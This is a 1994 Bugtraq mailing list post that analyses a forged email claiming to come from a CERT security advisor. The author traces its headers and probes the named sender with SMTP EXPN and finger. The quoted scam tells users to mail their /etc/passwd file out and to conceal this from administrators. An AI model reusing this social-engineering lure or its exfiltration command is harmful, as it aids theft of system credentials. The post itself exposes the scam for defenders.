Bugtraq mailing list archives

Stupid crackers exploiting stupid users

From: mouse () Collatz McRCIM McGill EDU (der Mouse)
Date: Sun, 23 Oct 1994 08:26:14 -0400

From: "Douglas R. Floyd" <dfloyd () paris eng utsa edu>
Message-Id: <9410230054.ZM10281 () paris eng utsa edu>
Date: Sun, 23 Oct 1994 00:54:14 -0500
To: bugtraq () crimelab com
Subject: Another request for passwords

I got this in the mail today (10-23).
Seems like someone is knocking on io.com now.


This appears to be a forged attempt to mailbomb someone else.  If you
read the headers carefully, you'll see that SFU appears in only the
From: header - the letter comes from helix.net and has a helix.net
Message-ID.  And when I looked at vanepp () sfu ca....

        [Thunder] 2> telnet whistler.sfu.ca smtp
        Trying 142.58.103.1 ...
        Connected to whistler.sfu.ca.
        Escape character is '^]'.
        220-whistler.sfu.ca Sendmail 8.6.8/SFU-2.6H ready at Sun, 23 Oct 1994
        05:10:36 -0700
        220 ESMTP spoken here
        expn vanepp
        503 I demand that you introduce yourself first
(Hmmm, well, shrug-okay...)
        helo thunder.mcrcim.mcgill.edu
        250 whistler.sfu.ca Hello xxxx () xxxx xxxx xxxx [xxx.xxx.x.xx], pleased to meet you
        expn vanepp
        250 Peter Van Epp <vanepp () whistler sfu ca>
        quit
        221 whistler.sfu.ca closing connection
        Connection closed by foreign host.

Okay, Peter Van Epp exists.

        [Thunder] 3> finger vanepp () whistler sfu ca      
        [whistler.sfu.ca]
        X.500 Finger Service...
        One exact match found for "vanepp":
        "Peter Van Epp, Computing Services, Simon Fraser University"
          Also known as:   
                            Peter Van Epp
          Mailbox Information:
                            internet : vanepp () sfu ca
                            internet : peter_van_epp () sfu ca
          User Class:      
                            staff

Computing Services?  "staff"?  A staff person at SFU surely knows
better than to send out this piece of stupidity, especially since "expn
root" informs me that vanepp is one of nine people who get root's mail.

So I think someone on helix.net originated this, probably the person
responsible for the first piece of stupidity.  What vanepp has to do
with it I have trouble imagining; I would suspect that sfu.ca had been
cracked and vanepp's .forward file replaced to point to the real
culprit, but EXPN and VRFY on whistler's SMTP server don't give me that
impression.

I suppose it's _possible_ that Peter Van Epp _is_ the person
responsible and that the mail was forged from his account on helix.net,
but that seems extremely unlikely.

I'm sending a copy to root () sfu ca so that (a) vanepp probably gets it,
and (b) if vanepp's mail is being stolen somehow that I can't see
through VRFY and EXPN, the other roots there can deal with it.

For those who haven't yet seen it, here's the message as quoted by
dfloyd:

BEGIN FUNKY MESSAGE --------

From vanepp () sfu ca  Sun Oct 23 00:00:56 1994
Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
(931110.SGI/930416.SGI.AUTO)
        for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
Received: from trance.helix.net
        by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
        id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
From: vanepp () sfu ca
Received: from  (helix.net [142.231.37.2]) by trance.helix.net
(8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
dfloyd () pentagon io com; Sat, 22 Oct 1994 21:33:23 -0700
Message-Id: <199410230433.VAA07859 () trance helix net>
Date: Sat, 22 Oct 1994 14:22:25
To: dfloyd () pentagon io com
Subject: Very Important
Status: RO

Dear user,

    It is imperative that I attain your /etc/passwd file
immediately.  It is for security reasons.  You can mail
it to me by typing:

            mail vanepp () sfu ca < /etc/passwd

Do not tell your system administrator.  I am
conducting an investigation on your system.  Thank you

Your identity will be kept confidential.  I guarantee it

Thank you for your cooperation.

Peter Van Epp      Technical Systems Operations
                   CERT Security Advisor
                   vanepp () sfu ca


END FUNKY MESSAGE -----


                                        der Mouse

                            mouse () collatz mcrcim mcgill edu

Current thread:

Another request for passwords Douglas R. Floyd (Oct 22)
- Re: Another request for passwords Charles Howes (Oct 23)
- Re: Another request for passwords That Whispering Wolf... (Oct 23)
  - Re: Another request for passwords Charles Howes (Oct 23)
    - Re: Another request for passwords christopher williams (Oct 24)
    - Re: Another request for passwords Brett Watson (Oct 25)
- Stupid crackers exploiting stupid users der Mouse (Oct 23)
  - Re: Stupid crackers exploiting stupid users Peter Van Epp (Oct 23)
  - Re: Stupid crackers exploiting stupid users Charles Howes (Oct 23)
    - Re: Stupid crackers exploiting stupid users pluvius (Oct 25)
    - Re: Stupid crackers exploiting stupid users Charles Howes (Oct 26)
    - Sun Mouse Bug David J. Bianco (Oct 26)
    - Network Volumetric Analysis (NVA) software Frank R. Swift (Oct 26)
- Re: Another request for passwords Justin J. Lister (Oct 23)
  - Re: Another request for passwords christopher williams (Oct 23)
    - Re: Another request for passwords Doug McLaren (Oct 24)
    - Re: Another request for passwords Charles Howes (Oct 27)

(Thread continues...)